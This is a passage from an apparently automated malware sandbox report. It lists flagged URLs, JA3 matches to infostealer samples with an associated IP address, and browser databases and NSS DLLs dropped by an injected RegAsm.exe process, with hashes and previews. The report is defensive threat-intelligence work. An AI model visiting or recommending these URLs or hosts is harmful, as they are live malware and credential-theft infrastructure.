                                          https://shop.ketochow.xyz/Get hashmaliciousUnknownBrowse
                                          • 2.19.122.221
                                          http://02.jie888.link/Get hashmaliciousUnknownBrowse
                                          • 69.192.160.133
                                          http://port01-2i9.pages.dev/Get hashmaliciousUnknownBrowse
                                          • 2.17.22.50
                                          http://iykdkk.pages.dev/Get hashmaliciousUnknownBrowse
                                          • 2.17.22.50

                                          JA3 Fingerprints

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          51c64c77e60f3980eea90869b68c58a8SecuriteInfo.com.Win64.Evo-gen.30302.14698.exeGet hashmaliciousCryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
                                          • 65.109.242.59
                                          SecuriteInfo.com.Win32.Malware-gen.198.6512.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                          • 65.109.242.59
                                          BI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                          • 65.109.242.59
                                          file.exeGet hashmaliciousVidarBrowse
                                          • 65.109.242.59
                                          file.exeGet hashmaliciousVidarBrowse
                                          • 65.109.242.59
                                          SecuriteInfo.com.Trojan.PWS.Steam.37259.28451.11337.exeGet hashmaliciousCryptOne, VidarBrowse
                                          • 65.109.242.59
                                          a6lzHWp4pa.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                          • 65.109.242.59
                                          file.exeGet hashmaliciousVidarBrowse
                                          • 65.109.242.59
                                          file.exeGet hashmaliciousVidarBrowse
                                          • 65.109.242.59
                                          37f463bf4616ecd445d4a1937da06e19XVM5nluelx.exeGet hashmaliciousBabuk, Djvu, SmokeLoaderBrowse
                                          • 104.102.42.29
                                          SecuriteInfo.com.Variant.Lazy.448806.29655.2426.dllGet hashmaliciousUnknownBrowse
                                          • 104.102.42.29
                                          SecuriteInfo.com.Variant.Lazy.448806.8704.4188.dllGet hashmaliciousUnknownBrowse
                                          • 104.102.42.29
                                          Service user.zipGet hashmaliciousUnknownBrowse
                                          • 104.102.42.29
                                          file.exeGet hashmaliciousBabuk, Djvu, SmokeLoaderBrowse
                                          • 104.102.42.29
                                          notfcacion.detallada_online.nu.msi_notfcacion.detallada_online.nu.msi_46956.msiGet hashmaliciousUnknownBrowse
                                          • 104.102.42.29
                                          factboletaeletricge.msiGet hashmaliciousUnknownBrowse
                                          • 104.102.42.29
                                          PDFixers.exeGet hashmaliciousUnknownBrowse
                                          • 104.102.42.29
                                          SecuriteInfo.com.Win64.Evo-gen.30302.14698.exeGet hashmaliciousCryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
                                          • 104.102.42.29
                                          SecuriteInfo.com.Win32.Malware-gen.198.6512.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                          • 104.102.42.29

                                          Dropped Files

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          C:\ProgramData\KECBFBAEBKJJ\mozglue.dllSecuriteInfo.com.Win64.Evo-gen.30302.14698.exeGet hashmaliciousCryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
                                            SecuriteInfo.com.Win32.Malware-gen.198.6512.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                              BI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                file.exeGet hashmaliciousVidarBrowse
                                                  btCbrSS2Je.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                    7urUz64I0Y.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                      file.exeGet hashmaliciousVidarBrowse
                                                        SecuriteInfo.com.Trojan.PWS.Steam.37259.28451.11337.exeGet hashmaliciousCryptOne, VidarBrowse
                                                          a6lzHWp4pa.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                                            file.exeGet hashmaliciousVidarBrowse
                                                              C:\ProgramData\KECBFBAEBKJJ\freebl3.dllSecuriteInfo.com.Win64.Evo-gen.30302.14698.exeGet hashmaliciousCryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
                                                                SecuriteInfo.com.Win32.Malware-gen.198.6512.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                                  BI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                      btCbrSS2Je.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                        7urUz64I0Y.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                            SecuriteInfo.com.Trojan.PWS.Steam.37259.28451.11337.exeGet hashmaliciousCryptOne, VidarBrowse
                                                                              a6lzHWp4pa.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                                                                file.exeGet hashmaliciousVidarBrowse

                                                                                  Created / dropped Files

                                                                                  C:\ProgramData\KECBFBAEBKJJ\BFCFBK

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8745947603342119
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                  Malicious:false
                                                                                  Reputation:moderate, very likely benign file
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\ProgramData\KECBFBAEBKJJ\CBAKJE

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):159744
                                                                                  Entropy (8bit):0.5394293526345721
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                  MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                  SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                  SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                  SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                  Malicious:false
                                                                                  Reputation:high, very likely benign file
                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\ProgramData\KECBFBAEBKJJ\DHDHCG

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:ASCII text, with very long lines (1717), with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):10237
                                                                                  Entropy (8bit):5.498288591230544
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:/nTFTRRFYbBp6SLZNMGaXU6qU4rzy+/3/OYiNBw8D7Sl:LreDFNMroyrdw60
                                                                                  MD5:0F58C61DE9618A1B53735181E43EE166
                                                                                  SHA1:CC45931CF12AF92935A84C2A015786CC810AEC3A
                                                                                  SHA-256:AE9C3109DD23F391DC58C564080932100F55C8E674176D7911D54FB0D3417AE0
                                                                                  SHA-512:DEA527C22D4AA607B00FBBCC1CDD9C6B69E92EC3B1B14649A086E87258AAD5C280BFB2835C165176E8759F575AA39D1B58E25CB40F60C7E88D94243A874B71BE
                                                                                  Malicious:false
                                                                                  Reputation:moderate, very likely benign file
                                                                                  Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                  C:\ProgramData\KECBFBAEBKJJ\DHIDHI

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):98304
                                                                                  Entropy (8bit):0.08235737944063153
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                  Malicious:false
                                                                                  Reputation:high, very likely benign file
                                                                                  Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\ProgramData\KECBFBAEBKJJ\DHIDHI-shm

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):32768
                                                                                  Entropy (8bit):0.017262956703125623
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                  MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                  SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                  SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                  SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                  Malicious:false
                                                                                  Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\ProgramData\KECBFBAEBKJJ\FCAAEB

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\ProgramData\KECBFBAEBKJJ\FHCGCF

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):155648
                                                                                  Entropy (8bit):0.5407252242845243
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                  MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                  SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                  SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                  SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\ProgramData\KECBFBAEBKJJ\FIEGCB

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\ProgramData\KECBFBAEBKJJ\FIIEHJ

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8508558324143882
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\ProgramData\KECBFBAEBKJJ\HCAEBF

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):5242880
                                                                                  Entropy (8bit):0.0357803477377646
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
                                                                                  MD5:76D181A334D47872CD2E37135CC83F95
                                                                                  SHA1:B563370B023073CE6E0F63671AA4AF169ABBF4E1
                                                                                  SHA-256:52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
                                                                                  SHA-512:23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\ProgramData\KECBFBAEBKJJ\HCAEBF-shm

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):32768
                                                                                  Entropy (8bit):0.017262956703125623
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                  MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                  SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                  SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                  SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                  Malicious:false
                                                                                  Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\ProgramData\KECBFBAEBKJJ\IJECAE

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\ProgramData\KECBFBAEBKJJ\KEGCBF

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\ProgramData\KECBFBAEBKJJ\freebl3.dll

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):685392
                                                                                  Entropy (8bit):6.872871740790978
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                  MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                  SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                  SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                  SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: SecuriteInfo.com.Win64.Evo-gen.30302.14698.exe, Detection: malicious, Browse
                                                                                  • Filename: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, Detection: malicious, Browse
                                                                                  • Filename: BI6oo9z4In.exe, Detection: malicious, Browse
                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                  • Filename: btCbrSS2Je.exe, Detection: malicious, Browse
                                                                                  • Filename: 7urUz64I0Y.exe, Detection: malicious, Browse
                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                  • Filename: SecuriteInfo.com.Trojan.PWS.Steam.37259.28451.11337.exe, Detection: malicious, Browse
                                                                                  • Filename: a6lzHWp4pa.exe, Detection: malicious, Browse
                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\ProgramData\KECBFBAEBKJJ\mozglue.dll

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):608080
                                                                                  Entropy (8bit):6.833616094889818
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                  MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                  SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                  SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                  SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: SecuriteInfo.com.Win64.Evo-gen.30302.14698.exe, Detection: malicious, Browse
                                                                                  • Filename: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, Detection: malicious, Browse
                                                                                  • Filename: BI6oo9z4In.exe, Detection: malicious, Browse
                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                  • Filename: btCbrSS2Je.exe, Detection: malicious, Browse
                                                                                  • Filename: 7urUz64I0Y.exe, Detection: malicious, Browse
                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                  • Filename: SecuriteInfo.com.Trojan.PWS.Steam.37259.28451.11337.exe, Detection: malicious, Browse
                                                                                  • Filename: a6lzHWp4pa.exe, Detection: malicious, Browse
                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\ProgramData\KECBFBAEBKJJ\msvcp140.dll

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):450024
                                                                                  Entropy (8bit):6.673992339875127
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                  MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                  SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                  SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                  SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                  C:\ProgramData\KECBFBAEBKJJ\nss3.dll

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):2046288
                                                                                  Entropy (8bit):6.787733948558952
                                                                                  Encrypted:false
                                                                                  SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                  MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                  SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                  SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
